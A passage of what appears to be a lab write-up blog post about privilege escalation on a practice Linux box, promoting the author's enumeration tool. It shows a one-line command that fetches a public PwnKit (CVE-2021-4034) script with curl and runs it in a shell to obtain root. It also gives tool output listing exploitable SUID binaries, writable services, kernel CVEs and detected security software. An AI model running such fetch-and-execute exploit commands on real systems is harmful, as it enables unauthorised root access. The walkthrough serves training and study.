https://substackcdn.com/image/fetch/$s_!sgsm!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25151610-873d-4b72-8151-3796608b37ad_1308x595.png 1272w, https://substackcdn.com/image/fetch/$s_!sgsm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25151610-873d-4b72-8151-3796608b37ad_1308x595.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p>sh -c &#8220;$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)&#8221;</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">-bash-5.0$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
To run a command as administrator (user "root"), use "sudo &lt;command&gt;".
See "man sudo_root" for details.

root@oscp:/home/oscp#</code></pre></div><p>That&#8217;s it, we gain Administrator.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Y9el!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91ed2a39-a572-4675-917c-5628092d91e7_679x439.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Y9el!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91ed2a39-a572-4675-917c-5628092d91e7_679x439.png 424w, https://substackcdn.com/image/fetch/$s_!Y9el!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91ed2a39-a572-4675-917c-5628092d91e7_679x439.png 848w, https://substackcdn.com/image/fetch/$s_!Y9el!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91ed2a39-a572-4675-917c-5628092d91e7_679x439.png 1272w, https://substackcdn.com/image/fetch/$s_!Y9el!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91ed2a39-a572-4675-917c-5628092d91e7_679x439.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Y9el!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91ed2a39-a572-4675-917c-5628092d91e7_679x439.png" width="609" height="393.74226804123714" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/91ed2a39-a572-4675-917c-5628092d91e7_679x439.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:439,&quot;width&quot;:679,&quot;resizeWidth&quot;:609,&quot;bytes&quot;:269876,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91ed2a39-a572-4675-917c-5628092d91e7_679x439.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Y9el!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91ed2a39-a572-4675-917c-5628092d91e7_679x439.png 424w, https://substackcdn.com/image/fetch/$s_!Y9el!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91ed2a39-a572-4675-917c-5628092d91e7_679x439.png 848w, https://substackcdn.com/image/fetch/$s_!Y9el!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91ed2a39-a572-4675-917c-5628092d91e7_679x439.png 1272w, https://substackcdn.com/image/fetch/$s_!Y9el!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F91ed2a39-a572-4675-917c-5628092d91e7_679x439.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Bonus: gxc-BloodPengu.py Discovery</h2><p>To find that path-way of PrivEsc, we can elevate BloodPengu Python kit, now it&#8217;s updated with RSA/Key logon support for enumeration.</p><p>BloodPengu at this Time is v1.4.2:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_A1s!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5843070a-0fd7-4691-9dbe-a15312d1fdca_1558x824.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_A1s!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5843070a-0fd7-4691-9dbe-a15312d1fdca_1558x824.png 424w, https://substackcdn.com/image/fetch/$s_!_A1s!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5843070a-0fd7-4691-9dbe-a15312d1fdca_1558x824.png 848w, https://substackcdn.com/image/fetch/$s_!_A1s!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5843070a-0fd7-4691-9dbe-a15312d1fdca_1558x824.png 1272w, https://substackcdn.com/image/fetch/$s_!_A1s!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5843070a-0fd7-4691-9dbe-a15312d1fdca_1558x824.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_A1s!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5843070a-0fd7-4691-9dbe-a15312d1fdca_1558x824.png" width="1456" height="770" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5843070a-0fd7-4691-9dbe-a15312d1fdca_1558x824.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:770,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:126185,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5843070a-0fd7-4691-9dbe-a15312d1fdca_1558x824.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!_A1s!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5843070a-0fd7-4691-9dbe-a15312d1fdca_1558x824.png 424w, https://substackcdn.com/image/fetch/$s_!_A1s!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5843070a-0fd7-4691-9dbe-a15312d1fdca_1558x824.png 848w, https://substackcdn.com/image/fetch/$s_!_A1s!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5843070a-0fd7-4691-9dbe-a15312d1fdca_1558x824.png 1272w, https://substackcdn.com/image/fetch/$s_!_A1s!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5843070a-0fd7-4691-9dbe-a15312d1fdca_1558x824.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(venv)&#9472;(root&#12927;kali)-[/]
&#9492;&#9472;# bloodpengu-python 192.168.179.89 -u oscp -k id_rsa -o out.json

                                                                      
                /MM0MM                                                
                     hM       -w1MMMxXX                               
                           wMMMMMMMMMMM0hM                            
                     h  /0MMhMhhMMM0MMMhMMMh                          
                       M/h0hMMxM/1hhhM&gt;hhh^x/^                        
                    hhMhMX hhMh       0&gt;     ww                       
                  MM   M0Mh0 -w      -xhI    ^                        
                    --h-1/Mh&gt;h-      0w    -  x                       
                   -XXXw&gt;1h wwIhXww-hhh^   whwhh                      
                    X&gt;I^h1 Iw- 0hMhhhhhwhhhhh                         
                    ^MI0-1 ^^Xww hhX&gt; M1hwhMwh                        
                  I &gt;1 h^ &gt;/  hw0-I0MXMMxwhMhhx     Mh&gt; w             
                 11 hhhhh1  /II00 ^0xMX1^hwh hh          0/           
               x&gt;0-xh ^x/  Xx^w0   h1Mh0Ihwh X&gt;&gt;0      wwM/           
               1 -xw  X  w0hxh&gt;   h/hM-/&gt;hXh^   &gt;w&gt;XhwXwIX            
              1 w0h&gt;   w/-hhw xx- MMwhw^0w1  &gt;w  -I II                
              Ix 0hM x/w0 1h &gt; X Ihhhh h/0^ /hhh/w/x                  
              h w^-h&gt;wh^I hxM  hhMhhh  wh- Ix1 Mhxhhhhw               
                 0&gt;00/1X   hhhhhh1hh w0x1 -&gt;X/0&gt; w^ hIhhw&gt;            
           &gt;w0/ -   /     1I^Xww1 -X0&gt; - 1w00X1X  10 - wXXx           
           I00-        w00/  I  &gt;0xhX/ 1  0/1Ix0wIx    Iw/x           
            1 wwhhhhhh1h &gt; 11  00-hh^ x1    ^   w&gt;wXw 0X0I            
            w/w1--  ^^wI^ &gt;&gt;  wwhhh0 ^I -w / 0   X&gt;x -1  1^           
              X 0I1 0^x1^x0   0whwI  ^wx  x&gt;h ^   I   1x 1            
                        Xx    xwhwX  w//  11 X/0  11  1 &gt;I            
                       Ix/    h/h&gt;I  0    h&gt;-1I0   &gt;I&gt;&gt;               
                       &gt; x/ 0  /hw&gt;&gt; ^XX0w- X&gt;h^                      
                            -  -whxwww10^-hw/^0                       
                                ^--^  -^0w/&gt;ww                        
                                 Iw-xh &gt;I-                            
                                     w                                

                           v1.4.2 [Mad Horv3n]                           

  gxc-BloodPengu.py v1.4.2 | by &lt;@byt3n33dl3&gt;
  Data collector in Python for BloodPengu APM

  ----------------------------------------------------------------------

  [*]  Target  : 192.168.179.89:22
  [*]  User    : oscp
  [*]  Auth    : key:id_rsa
  [*]  Mode    : full collection
  [*]  Output  : out.json

  [*]  Connecting to 192.168.179.89:22...
  [+]  Connected in 0.37s  -  oscp@192.168.179.89:22
  [+]  Remote  : Linux oscp 5.4.0-40-generic #44-Ubuntu SMP Tue Jun 23 00:01:04 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

  ----------------------------------------------------------------------

  [*]  Collecting users and groups...
  [+]  Users: 34  |  Groups: 60
  [*]  Collecting sudo rules...
  [-]  sudo -l returned nothing - no sudo access or not in sudoers
  [*]  Collecting SUID/SGID binaries...
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1885/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1885/bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1754/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /snap/core18/1754/bin/umount
  [CRITICAL]  suid            GTFOBins SUID binary: /usr/bin/mount
  [CRITICAL]  suid            GTFOBins SUID binary: /usr/bin/at
  [CRITICAL]  suid            GTFOBins SUID binary: /usr/bin/bash
  [CRITICAL]  suid            GTFOBins SUID binary: /usr/bin/umount
  [+]  SUID/SGID: 66  |  GTFOBins hits: 8
  [*]  Collecting privileged group memberships...
  [CRITICAL]  groups          Member of lxd group - image escape to root
  [HIGH    ]  groups          Member of sudo group - likely sudo access
  [POTENTIAL]  groups          Member of adm - log access, possible credential leakage
  [+]  Groups: adm, cdrom, dip, lxd, oscp, plugdev, sudo
  [*]  Collecting systemd service units...
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/rcS.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/hwclock.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/x11-common.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/lvm2.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/screen-cleanup.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/cryptdisks.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/multipath-tools-boot.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/cryptdisks-early.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/rc.service
  [CRITICAL]  services        Writable systemd unit: /lib/systemd/system/sudo.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/rcS.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/hwclock.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/x11-common.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/lvm2.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/screen-cleanup.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/cryptdisks.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/multipath-tools-boot.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/cryptdisks-early.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/rc.service
  [CRITICAL]  services        Writable systemd unit: /usr/lib/systemd/system/sudo.service
  [+]  Units scanned: 523  |  Writable: 20
  [*]  Collecting cron jobs and scheduled tasks...
  [+]  Cron entries collected: 1
  [*]  Collecting kernel information...
  [HIGH    ]  kernel          Kernel 5.4.0-40-generic may be vulnerable to CVE-2021-4034
  [HIGH    ]  kernel          Kernel 5.4.0-40-generic may be vulnerable to CVE-2021-3156
  [HIGH    ]  kernel          Kernel 5.4.0-40-generic may be vulnerable to CVE-2022-0847
  [+]  Kernel: 5.4.0-40-generic  |  CVE matches: 3
  [*]  Collecting container and cloud context...
  [+]  Docker socket: False  |  In container: False
  [*]  Collecting network information...
  [POTENTIAL]  network         Interesting internal service: mysql (port 3306): tcp    LISTEN  0       70           127.0.0.1:33060        0.0.0.0:*
  [POTENTIAL]  network         Interesting internal service: mysql (port 3306): tcp    LISTEN  0       151          127.0.0.1:3306         0.0.0.0:*
  [+]  Interfaces: 1  |  Interesting services: 2
  [*]  Collecting environment and interesting files...
  [CRITICAL]  env             SSH/crypto key: /home/oscp/.ssh/id_rsa  (perms: 600)
  [HIGH    ]  env             Sensitive commands in history: /home/oscp/.bash_history
  [+]  Env collected  |  Interesting files: 2
  [*]  Running SACSPengu analysis...
  [POTENTIAL]  sacspengu       Compiler/interpreter: python3 -&gt; /usr/bin/python3
  [POTENTIAL]  sacspengu       Compiler/interpreter: perl -&gt; /usr/bin/perl
  [POTENTIAL]  sacspengu       Compiler/interpreter: php -&gt; /usr/bin/php
  [CRITICAL]  sacspengu       Dangerous capability: /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
  [+]  Compilers: 3  |  Writable PATH dirs: 0  |  Capabilities scanned
  [*]  Running AVRisk...
  [HIGH    ]  avrisk          AppArmor active: apparmor module is loaded.
  [HIGH    ]  avrisk          Security software detected: AUDITD  (procs=auditd)
  [HIGH    ]  avrisk          Security software detected: APPARMOR  (bins=/usr/sbin/aa-status  paths=/etc/apparmor,/etc/apparmor.d)
  [HIGH    ]  avrisk          Security software detected: SELINUX  (paths=/etc/selinux)
  [POTENTIAL]  avrisk          Active log files found (10) : review for credential or activity capture
  [+]  Security products detected: 3  |  Products: auditd, apparmor, selinux

  ----------------------------------------------------------------------

  [+]  Collection complete in 102.00s

  [CRITICAL ]  31
  [HIGH     ]  9
  [POTENTIAL]  7

  [~]  Total findings  :  47
  [~]  Graph nodes     :  371
  [~]  Graph edges     :  130
  [~]  Output file     :  out.json

  [+]  Import out.json into BloodPengu via Import JSON

  ----------------------------------------------------------------------

  gxc-BloodPengu.py v1.4.2 by &lt;@byt3n33dl3&gt; &lt;github.com/byt3n33dl3/gxc-BloodPengu.py&gt;</code></pre></div><p>Let&#8217;s see the Graph:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!LGgz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf2acfd2-0158-4c2b-ae75-51a2753f0ad8_1731x827.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!LGgz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf2acfd2-0158-4c2b-ae75-51a2753f0ad8_1731x827.png 424w, https://substackcdn.com/image/fetch/$s_!LGgz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf2acfd2-0158-4c2b-ae75-51a2753f0ad8_1731x827.png 848w, https://substackcdn.com/image/fetch/$s_!LGgz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf2acfd2-0158-4c2b-ae75-51a2753f0ad8_1731x827.png 1272w, https://substackcdn.com/image/fetch/$s_!LGgz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf2acfd2-0158-4c2b-ae75-51a2753f0ad8_1731x827.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!LGgz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf2acfd2-0158-4c2b-ae75-51a2753f0ad8_1731x827.png" width="1456" height="696" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cf2acfd2-0158-4c2b-ae75-51a2753f0ad8_1731x827.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:696,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:381411,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf2acfd2-0158-4c2b-ae75-51a2753f0ad8_1731x827.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!LGgz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf2acfd2-0158-4c2b-ae75-51a2753f0ad8_1731x827.png 424w, https://substackcdn.com/image/fetch/$s_!LGgz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf2acfd2-0158-4c2b-ae75-51a2753f0ad8_1731x827.png 848w, https://substackcdn.com/image/fetch/$s_!LGgz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf2acfd2-0158-4c2b-ae75-51a2753f0ad8_1731x827.png 1272w, https://substackcdn.com/image/fetch/$s_!LGgz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf2acfd2-0158-4c2b-ae75-51a2753f0ad8_1731x827.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>As we see, there&#8217;s many attack-paths, and 3 of em are having Kernel effect:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OUw7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6cbdda31-e1c0-462d-8b73-780d0fbe8fd1_1731x827.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OUw7!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6cbdda31-e1c0-462d-8b73-780d0fbe8fd1_1731x827.png 424w, https://substackcdn.com/image/fetch/$s_!OUw7!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6cbdda31-e1c0-462d-8b73-780d0fbe8fd1_1731x827.png 848w, https://substackcdn.com/image/fetch/$s_!OUw7!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6cbdda31-e1c0-462d-8b73-780d0fbe8fd1_1731x827.png 1272w, https://substackcdn.com/image/fetch/$s_!OUw7!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6cbdda31-e1c0-462d-8b73-780d0fbe8fd1_1731x827.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OUw7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6cbdda31-e1c0-462d-8b73-780d0fbe8fd1_1731x827.png" width="1456" height="696" 